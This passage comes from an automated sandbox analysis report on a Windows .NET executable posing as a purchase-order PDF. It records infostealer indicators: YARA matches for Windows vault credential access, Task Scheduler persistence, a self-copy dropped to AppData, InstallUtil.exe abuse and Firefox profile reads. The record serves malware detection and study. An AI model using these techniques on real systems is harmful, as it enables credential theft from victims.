                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002C17000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000000.1725389344.00000000006D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753113997.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003BD8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765774518.0000000005F60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeBinary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3c96840.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeFile created: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeReversingLabs: Detection: 34%
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeVirustotal: Detection: 25%
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exeString found in binary or memory: SingularUMatrix5SingularUMatrixWithElement5SingularVectorsNotComputedMSpecialCasePlannedButNotImplementedYet-StopCriterionDuplicate)StopCriterionMissing#StringNullOrEmpty
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeFile read: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe "C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exe"
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe "C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe"
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe "C:\Users\user\AppData\Roaming\Afoagcjtqvi.exe"
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
